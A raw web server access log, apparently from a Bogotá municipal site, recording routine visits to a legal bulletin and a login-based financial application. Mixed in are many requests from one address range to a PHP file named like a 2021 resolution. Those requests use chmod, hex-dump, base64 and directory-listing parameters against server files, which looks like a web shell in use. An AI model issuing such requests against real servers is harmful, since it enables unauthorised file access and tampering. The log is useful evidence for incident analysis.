172.22.2.4 - - [13/Jul/2024:14:05:12 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7588
47.128.30.56 - - [13/Jul/2024:14:05:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6309.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [13/Jul/2024:14:06:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [13/Jul/2024:14:06:03 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [13/Jul/2024:14:06:03 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
47.128.24.233 - - [13/Jul/2024:14:06:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6945.pdf HTTP/1.1" 200 2714
172.22.2.4 - - [13/Jul/2024:14:06:07 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
47.128.125.68 - - [13/Jul/2024:14:06:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5913.pdf HTTP/1.1" 200 2714
47.128.120.43 - - [13/Jul/2024:14:06:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5681.pdf HTTP/1.1" 200 2740
216.245.221.92 - - [13/Jul/2024:14:06:36 -0500] "HEAD / HTTP/1.1" 200 -
47.128.43.102 - - [13/Jul/2024:14:06:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7462.pdf HTTP/1.1" 200 2739
47.128.16.141 - - [13/Jul/2024:14:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=jquery.masonry.min.js&fullhexdump=1 HTTP/1.1" 200 2748
66.249.66.20 - - [13/Jul/2024:14:06:52 -0500] "GET /BLA/resoluciones/AUTOS%202023/2843.pdf HTTP/1.1" 200 412903
66.249.66.21 - - [13/Jul/2024:14:06:53 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007/RES%202007%201201%20AL%201300/&sort=name&order=asc HTTP/1.1" 200 26864
47.128.125.59 - - [13/Jul/2024:14:06:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=shutdown.sh&fullhexdump=1 HTTP/1.1" 200 2740
201.245.192.253 - - [13/Jul/2024:14:07:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.125.47 - - [13/Jul/2024:14:07:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7829.pdf HTTP/1.1" 200 2714
47.128.21.235 - - [13/Jul/2024:14:07:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5387.pdf HTTP/1.1" 200 2714
47.128.121.55 - - [13/Jul/2024:14:07:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=06938.pdf HTTP/1.1" 200 2714
47.128.126.153 - - [13/Jul/2024:14:07:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=encoder&d=C%3A%5Cdmz%5Csrc%5Cxampp-start-stop%5C HTTP/1.1" 200 3068
47.128.29.216 - - [13/Jul/2024:14:07:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7820.pdf HTTP/1.1" 200 2714
47.128.33.155 - - [13/Jul/2024:14:07:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&f=BabelSans-B.fdb HTTP/1.1" 200 2745
201.245.192.253 - - [13/Jul/2024:14:08:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.248 - - [13/Jul/2024:14:08:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=09059.pdf HTTP/1.1" 200 2740
47.128.17.225 - - [13/Jul/2024:14:08:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7626.pdf HTTP/1.1" 200 2714
47.128.52.53 - - [13/Jul/2024:14:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5433.pdf HTTP/1.1" 200 2739
47.128.112.214 - - [13/Jul/2024:14:08:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7730.pdf HTTP/1.1" 200 2740
47.128.111.65 - - [13/Jul/2024:14:08:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=6215.pdf HTTP/1.1" 200 2739
47.128.25.158 - - [13/Jul/2024:14:08:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7499.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [13/Jul/2024:14:09:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.85 - - [13/Jul/2024:14:09:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7547.pdf HTTP/1.1" 200 2739
47.128.58.213 - - [13/Jul/2024:14:09:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7467.pdf HTTP/1.1" 200 2714
47.128.16.155 - - [13/Jul/2024:14:09:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7093.pdf HTTP/1.1" 200 2714
172.22.2.4 - - [13/Jul/2024:14:08:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
47.128.58.200 - - [13/Jul/2024:14:09:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7005.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [13/Jul/2024:14:09:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
172.22.2.4 - - [13/Jul/2024:14:08:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.39.104 - - [13/Jul/2024:14:09:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=05074.pdf HTTP/1.1" 200 2714
47.128.63.167 - - [13/Jul/2024:14:09:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&f=jquery.masonry.min.js HTTP/1.1" 200 2748
201.245.192.253 - - [13/Jul/2024:14:10:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.23.186 - - [13/Jul/2024:14:10:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=RESOLUCION+3149+DE+2010.PDF HTTP/1.1" 200 2765
47.128.27.17 - - [13/Jul/2024:14:10:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=03899.pdf HTTP/1.1" 200 2741
47.128.24.70 - - [13/Jul/2024:14:10:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7452.pdf HTTP/1.1" 200 2739
66.249.66.21 - - [13/Jul/2024:14:10:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0868.pdf HTTP/1.1" 200 1950750
172.22.2.4 - - [13/Jul/2024:14:08:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
47.128.99.41 - - [13/Jul/2024:14:10:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7147.pdf HTTP/1.1" 200 2714
47.128.112.212 - - [13/Jul/2024:14:10:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7361.pdf HTTP/1.1" 200 2740
47.128.122.214 - - [13/Jul/2024:14:10:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7197.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [13/Jul/2024:14:11:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [13/Jul/2024:14:11:36 -0500] "HEAD / HTTP/1.1" 200 -
47.128.47.102 - - [13/Jul/2024:14:11:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=03487.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [13/Jul/2024:14:12:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.115.221 - - [13/Jul/2024:14:12:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7829.pdf HTTP/1.1" 200 2740
47.128.118.73 - - [13/Jul/2024:14:12:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7092.pdf HTTP/1.1" 200 2739
47.128.43.134 - - [13/Jul/2024:14:12:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&f=xamppserver.inc HTTP/1.1" 200 2743
47.128.46.68 - - [13/Jul/2024:14:12:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5135.PDF HTTP/1.1" 200 2901
47.128.60.162 - - [13/Jul/2024:14:12:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7809.pdf HTTP/1.1" 200 2740
47.128.28.244 - - [13/Jul/2024:14:12:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&f=fh10.gif HTTP/1.1" 200 2739
201.245.192.253 - - [13/Jul/2024:14:13:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.40.224 - - [13/Jul/2024:14:13:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=RESOLUCION+6526+DE+2010.PDF HTTP/1.1" 200 2714
47.128.98.92 - - [13/Jul/2024:14:13:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=RESOLUCION+1403+DE+2010.PDF HTTP/1.1" 200 2766
47.128.28.37 - - [13/Jul/2024:14:13:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=RESOLUCION+4005+DE+2010.PDF HTTP/1.1" 200 2714
201.245.192.253 - - [13/Jul/2024:14:14:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.255.22 - - [13/Jul/2024:14:14:03 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.255.22 - - [13/Jul/2024:14:14:03 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:04 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12419
201.245.255.22 - - [13/Jul/2024:14:14:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:05 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:07 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16807
201.245.255.22 - - [13/Jul/2024:14:14:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:07 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:08 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.255.22 - - [13/Jul/2024:14:14:08 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:29 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:29 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
173.252.95.115 - - [13/Jul/2024:14:14:29 -0500] "GET /15-negocios-verdes-verificados-por-la-secretaria-de-ambiente-participan-en-la-feria-hecho-en-bogota.html HTTP/1.1" 200 1007
173.252.95.114 - - [13/Jul/2024:14:14:29 -0500] "GET /15-negocios-verdes-verificados-por-la-secretaria-de-ambiente-participan-en-la-feria-hecho-en-bogota.html HTTP/1.1" 200 1007
201.245.255.22 - - [13/Jul/2024:14:14:29 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 193
201.245.255.22 - - [13/Jul/2024:14:14:29 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 37895
201.245.255.22 - - [13/Jul/2024:14:14:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:30 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 10632
201.245.192.253 - - [13/Jul/2024:14:14:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
186.102.108.175 - - [13/Jul/2024:14:14:31 -0500] "GET /sipse/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 17021
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:14:32 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12733
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=ocL-wLmujtJ2+u4CfGZqXLOg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=ocL-wLmujtJ2+u4CfGZqXLOg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=ocL-wLmujtJ2+u4CfGZqXLOg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=ocL-wLmujtJ2+u4CfGZqXLOg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=ocL-wLmujtJ2+u4CfGZqXLOg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=ocL-wLmujtJ2+u4CfGZqXLOg.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
201.245.255.22 - - [13/Jul/2024:14:14:49 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
201.245.255.22 - - [13/Jul/2024:14:14:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16775
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.255.22 - - [13/Jul/2024:14:14:54 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
201.245.255.22 - - [13/Jul/2024:14:14:58 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
201.245.255.22 - - [13/Jul/2024:14:14:58 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
201.245.255.22 - - [13/Jul/2024:14:14:59 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 193
201.245.255.22 - - [13/Jul/2024:14:14:59 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 37895
201.245.255.22 - - [13/Jul/2024:14:14:59 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:14:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:15:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 10632
201.245.255.22 - - [13/Jul/2024:14:15:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 4090
201.245.255.22 - - [13/Jul/2024:14:15:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 184
201.245.192.253 - - [13/Jul/2024:14:15:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.255.22 - - [13/Jul/2024:14:15:02 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 32306
201.245.255.22 - - [13/Jul/2024:14:15:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:15:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:15:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:15:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:15:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:15:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.255.22 - - [13/Jul/2024:14:15:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.102.108.175 - - [13/Jul/2024:14:15:02 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11158
